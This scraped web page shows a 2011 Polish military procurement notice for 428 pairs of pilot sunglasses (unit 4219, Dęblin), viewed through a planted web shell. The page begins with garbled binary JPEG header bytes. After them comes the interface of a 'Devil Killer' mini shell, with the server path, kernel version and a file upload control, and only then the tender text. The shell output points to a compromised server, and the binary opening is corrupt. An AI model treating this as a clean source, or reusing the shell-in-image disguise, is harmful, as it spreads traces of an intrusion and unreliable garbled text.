JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111021/277441-N-2011.html

<p class="kh_header"><b>Dęblin: Dostawa okularów przeciwsłonecznych dla personelu latającego będącego na zaopatrzeniu 5 WOG - u w Dęblinie, Nr 46/11/N,</b><br>
<b>Numer ogłoszenia: 277441 - 2011; data zamieszczenia: 21.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4219 , 08-521 Dęblin, woj. lubelskie, tel. 0-81 5519510, 5517818, faks 0-81 5519536.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa okularów przeciwsłonecznych dla personelu latającego będącego na zaopatrzeniu 5 WOG - u w Dęblinie, Nr 46/11/N,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest jednorazowa dostawa 428 szt. okularów przeciwsłonecznych (okularów pilota) dla personelu latającego Sił Powietrznych jednostek będących na zaopatrzeniu 5 WOG  u w Dęblinie. Szczegółowo przedmiot zamówienia został określony poniżej, a także w załączniku Nr 1 do siwz tj. formularzu ofertowym. 

Szczegółowy opis przedmiotu zamówienia:
1. Przeznaczenie okularów przeciwsłonecznych 

Okulary przeciwsłoneczne pilota przeznaczone są dla personelu latającego Sił Powietrznych w warunkach odpowiadających warunkom eksploatacji statków powietrznych. Przedmiotowe okulary potrzebne są do ochrony oczu przed promieniowaniem słonecznym, uderzeniem ciał stałych np. piasku i rozbryzgami cieczy z jednoczesnym zachowaniem bezpieczeństwa i komfortu przy długotrwałym i nieprzerwanym użytkowaniu. 
2. Wymagania użytkowe i parametry techniczne.

Okulary przeciwsłoneczne pilota muszą spełniać następujące wymagania:
2.1	Konstrukcja okularów powinna składać się z metalowej ramki oprawy i oprawionych w niej szybek ochronnych filtrów chroniących przed olśnieniem słonecznym o zabarwieniu szarym, szaro zielonym lub brązowym.
2.2	Oprawy powinny być w kolorze czarnym z możliwością łatwego dopasowania wielkości oprawy do indywidualnych potrzeb użytkownika oprawy powinny być dostępne w dwóch lub trzech wielkościach lub regulacją wielkości. Miejsca, w których oprawy okularów stykają się bezpośrednio z twarzą końce zauszników oraz noski powinny być wykonane z materiału zapewniającego wysoki komfort użytkowania przy długotrwałym, nieprzerwanym użytkowaniu.
2.3	Zauszniki powinny być proste, stosunkowo płaskie, a końce zauszników lekko zagięte do wewnątrz, przylegające do głowy. Ponadto zauszniki powinny zapobiegać przemieszczaniu się okularów w trakcie ruchów głowy, być regulowane, cienkie na końcu z możliwością dopasowania pod hełm pilota.
2.4	Szybki ochronne powinny być wykonane z utwardzonego szkła organicznego lub innych wysokiej jakości materiałów stosowanych w optyce oftalmicznej np. CR-39, poliwęglan. Powinny zapewniać ochronę przed olśnieniem słonecznym zgodnie z poniższymi parametrami.
2.5	Nominalna wysokość szybki ochronnej mierzona w punkcie patrzenia powinna wynosić nie mniej niż 35 mm. Dodatkowo szybki ochronne powinny posiadać filtr antyrefleksyjny, bez polaryzacji,  mogą być pokryte powłoką lustrzaną.
2.6	Do kompletnych okularów należy dołączyć futerał etui plastikowy twardy w kolorze czarnym, szarym lub brązowym, wewnątrz powlekany miękkim flokiem oraz ściereczki z mikrofibry.
2.7	Szczegółowa specyfikacja wymagań oraz metod badań okularów przeciwsłonecznych przedstawiono w tablicy nr 1  została opracowana w oparciu o następujące Polskie Normy:
PN EN 1836+A1 : 2009 Ochrona indywidualna oczu okulary i filtry chroniące przed olśnieniem słonecznym do zastosowań ogólnych, filtry do bezpośredniej obserwacji słońca.
PN EN 167:2005 Ochrona indywidualna oczu  Optyczne metody badań.
PN EN 168:2005 Ochrona indywidualna oczu  Nieoptyczne metody badań.
PN EN ISO 8980 4:2007 Optyka oftalmiczna  Gotowe soczewki okularowe niekrojone. 
Cześć 4: Wymagania i metody badań dotyczące powłok przeciwodblaskowych.
2.8	Oceniane parametry w tablicy 1 podzielono na trzy grupy
Parametry dotyczące konstrukcji oraz jakości zastosowanych materiałów pozycje od 1 do 4
Parametry optyczne pozycje od 5 do 9
Parametry określające ochronę przed czynnikami zewnętrznymi pozycje od 10 do 13
Parametry określające znakowanie oraz informacje dla użytkownika pozycje od 14 do 15Szybki ochronne okularów spełniające niniejsze wymagania umożliwiają obserwację informacji wyświetlanych na ekranach ciekłokrystalicznych.

3. Zasady odbioru

3.1	Tryb oceny zgodności

Ocenę zgodności wykonania wyrobu z postanowieniami niniejszej Wymagań Techniczno Użytkowych WTU należy prowadzić według zasad określonych w ustawie z dnia17 listopada 2006 roku o systemie oceny zgodności wyrobów przeznaczonych na potrzeby obronności i bezpieczeństwa państwa Dz. U. z 2006 r. Nr 23, poz. 1700 z późn. zm. oraz zgodnie z rozporządzeniem Ministra Obrony Narodowej z dnia 6 kwietnia 2007 r. w sprawie szczegółowego sposobu prowadzenia oceny zgodności wyrobów przeznaczonych na potrzeby obronności państwa Dz. U. z 2007 r. Nr 78, poz. 528 z późn. zm. Zgodnie z § 4 przywołanego rozporządzenia dla okularów przeciwsłonecznych ustala się tryb I oceny zgodności. 
3.2	Nadzór nad wyrobem.

3.2.1	Postanowienia ogólne.

Nadzór nad czynnościami związanymi z wyrobem prowadzi Rejonowe Przedstawicielstwo Wojskowe RPW lub inny organ wskazany przez Zamawiającego w umowie. Organ ten dokonuje odbioru wojskowego wyrobu.
W celu kontroli jakości i odbioru zwolnienia wyrobów ustala się następujące rodzaje badań kontrolnych:
zdawczo odbiorcze Z O
okresowe O
Podstawowymi dokumentami przy wykonywaniu oceny  zgodności, badań kontrolnych i odbiorze zwolnieniu okularów przeciwsłonecznych są:
 niniejsze WTU;
 normy wskazane w niniejszych wymaganiach
Wyroby przedstawione do badań zgodności z wymaganiami niniejszych WTU powinny być odebrane zwolnione przez służby Kontroli Jakości J Dostawcy Wykonawcy. Odbiór należy potwierdzić odpowiednimi dokumentami i pieczęciami działu KJ.
W przypadku uzyskania wyników badań zdawczo odbiorczych lub okresowych niezgodnych z wymaganiami określonymi w niniejszych WTU RPW wstrzymuje odbiór zwolnienie badanej partii wyrobów. Odbiór  zwolnienie partii może nastąpić po usunięciu błędów wykonania oraz potwierdzeniu poprawności wykonania wyrobów pozytywnymi wynikami wymagań.
Wyrób powinien także spełniać dodatkowe wymagania jakościowe, jeżeli zapisano je w umowie. Sposób potwierdzenia tych badań określa umowa.
3.2.2	Badania zdawczo-odbiorcze.

Badania zdawczo odbiorcze wykonuje się w celu sprawdzenia, czy wyroby są wykonane zgodnie z wybranymi wymaganiami niniejszych wymagań. Pozytywny wynik badań jest podstawą odbioru wyrobu. Wyroby do badań pobiera się z partii wyrobów o liczebności nie większej niż 5000 kpl. o tym samym oznaczeniu klasyfikacyjnym, tej samej jakości i cenie, przedstawionych do jednorazowego odbioru. Próbki do badania pobiera przedstawiciel RPW z udziałem komisji Dostawcy Wykonawcy.

Badania wykonują:
przedstawiciel RPW siłami i środkami Dostawcy/Wykonawcy. W zakresie określonym w tablicy 2 Lp.1,2,3.
laboratoria w zakresie określonym w tablicy 2, Lp.4.
Dla pierwszej partii wyrobów dostarczonych zgodnie z zawartą umową badania laboratoryjne należy wykonać w laboratorium akredytowanym lub spełniającym wymagania normy PN EN ISO ICE 17025. Dla kolejnych partii dopuszcza się przeprowadzenie badań w innym laboratorium. Jeden egzemplarz wyników badań laboratoryjnych Dostawca/Wykonawca przekazuje RPW.
W przypadku zaistnienia przesłanek, które mogą świadczyć o pogorszeniu jakości wyrobu lub innych materiałów składowych RPW może pobrać losowo z bieżącej partii produkcyjnej wyroby i laboratorium akredytowane lub spełniające wymagania normy PN EN ISO ICE 17025. Pozytywne wyniki przeprowadzonych badań należy zaliczyć do badań zdawczo odbiorczych partii. Potwierdzone w badaniach niezgodności wyrobów z wymaganiami określonymi w niniejszych wymaganiach skutkuje rozmieszczeniem badań zdawczo odbiorczych lub zwiększeniem liczności próby wg uzgodnień między Dostawcą Wykonawcą a RPW. Badania te Dostawca Wykonawca wykonuje w laboratorium akredytowanym lub spełniającym wymagania normy PN-EN ISO ICE 17025, bez dodatkowego finansowania przez MON, a jeden egzemplarz wyników badań przekazuje RPW.

3.2.2 Badania okresowe.

Badania okresowe wykonuje się w celu okresowego sprawdzenia czy wyroby są zgodne z wymaganiami podanymi w niniejszych WTU, w celu sprawdzenia stabilności procesu technologicznego podczas ich wytwarzania, w celu sprawdzenia stabilności procesu technologicznego podczas ich wytwarzania, potwierdzenia możliwości kontynuowania wytwarzania wyrobów według obowiązujących wymagań oraz w celu stwierdzenia możliwości odbioru/zwolnienia wyrobów. Badania okresowe wykonuje Dostawca Wykonawca, przy udziale i pod kontrolą przedstawiciela RPW  nie dotyczy badań laboratoryjnych .
Badania okresowe przeprowadza się dla co piątej partii wyrobów, co najmniej raz w roku, po wykonaniu dla tej partii badań zdawczo odbiorczych, pod warunkiem, że badania zdawczo  odbiorcze tej partii zakończyły się wynikiem pozytywnym. Do badań okresowych pobierana jest próbka o liczności  wymaganej w prowadzonych badaniach. Wyroby do badania okresowych pobiera przedstawiciel RPW z udziałem komisji Dostawcy Wykonawcy.
Badania powinny być przeprowadzone zgodnie z zakresem określonym w tablicy 2. Badania laboratoryjne wykonuje się w laboratorium akredytowanym lub spełniającym wymagania normy PN EN ISO/ICE 17025. Dostawca Wykonawca przekazuje RPW jeden egzemplarz wyników badań. 

Pozytywne wyniki badań okresowych są podstawą odbioru/zwolnienia partii wyrobów przez RPW. Partię wyrobów należy uznać za niezgodną z wymaganiami, jeżeli chociażby jedna z badanych laboratoryjnie własności dla jednego z badanych wyrobów, nie spełnia wymagań podanych w niniejszych wymaganiach.

3.2.4.	Zakres, wymagania i metody badań.
Zestawienie zakresów wymagań i metod badań dla poszczególnych rodzajów badań kontrolnych przedstawiono w tablicy 2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie prawo zwiększenia poprzez złożenie dodatkowego zamówienia ilości okularów będących przedmiotem zamówienia w przypadkach niezależnych od Zamawiającego, których nie można było przewidzieć mimo dochowania należytej staranności przy ustalaniu potrzeb. Zamówienie może zostać zwiększone do 20 %  wartości zamówienia brutto. Termin realizacji dodatkowego zamówienia zostanie ustalony.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.73.30.00-7, 18.14.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta będzie musiała być zabezpieczona wadium o wartości
4 800, 00 zł.  słownie: cztery tysiące osiemset złotych

 Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007r., Nr 42, poz. 275
W przypadku gdy wykonawca wnosi wadium w poręczeniach lub gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez inne podmioty oryginał musi zostać złożony w kasie Jednostki Wojskowej Nr 4219 w Dęblinie przy ul. Brygady Pościgowej 5 przed upływem terminu składania ofert, a kserokopia potwierdzona za zgodność z oryginałem przez wykonawcę dołączona do oferty.
Z treści złożonego poręczenia, gwarancji bankowej lub gwarancji ubezpieczeniowej musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego upełnomocnionego przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny z podaniem imienia i nazwiska. 

Wadium musi być wniesione przed upływem terminu składania ofert. 
Wadium wnoszone w formie pieniężnej należy wnieść na konto
Jednostki Wojskowej Nr 4219 w Dęblinie Nr  84 1130 1206 0028 9105 1620 0001, z dopiskiem  WADIUM  do dnia 31 października  2011 r. do godz. 12.00.

Za termin wniesienia wadium w formie pieniężnej zostanie uznany termin uznania rachunku zamawiającego data potwierdzenia wpływu środków na rachunek zamawiającego).
Wykonawcę, który nie wniósł wadium wyklucza się por. art. 24 ust. 2 pkt. 2 Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
2.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
3.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to 
z przyczyn nieleżących po jego stronie.
4.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta zostanie wybrana:
a odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c zawarcie umowy  w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunku dokonana będzie zgodnie z formułą spełnia  nie spełnia na podstawie treści złożonego  oświadczenia w trybie art. 22 ust. 1 pzp załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunku dokonana będzie zgodnie z formułą spełnia   nie spełnia na podstawie treści złożonego  oświadczenia w trybie art. 22 ust. 1 pzp  załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunku dokonana będzie zgodnie z formułą spełnia  nie spełnia na podstawie treści złożonego  oświadczenia w trybie art. 22 ust. 1 pzp załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunku dokonana będzie zgodnie z formułą spełnia  nie spełnia na podstawie treści złożonego  oświadczenia w trybie art. 22 ust. 1 pzp załącznik nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawców w w warunku dokonana będzie zgodnie z formułą spełnia  nie spełnia na podstawie treści złożonego  oświadczenia w trybie art. 22 ust. 1 pzp załącznik nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">oświadczenie producenta okularów (oferowanej marki), że produkt jest oryginalny i występuje w legalnej sieci dystrybucji
potwierdzenie spełniania parametrów technicznych oraz jakościowych oferowanych okularów</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykaz punktów serwisowych
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kancelaria Jawna pok. nr 20 Jednostki Wojskowej 4219, Lotnisko bud 205, 08-521 Dęblin,pocztą po wpłacie 20 zł, na 15101013390000972231000000. pisemna prośbę należny przesłać łącznie z dowodem wpłaty..</p>
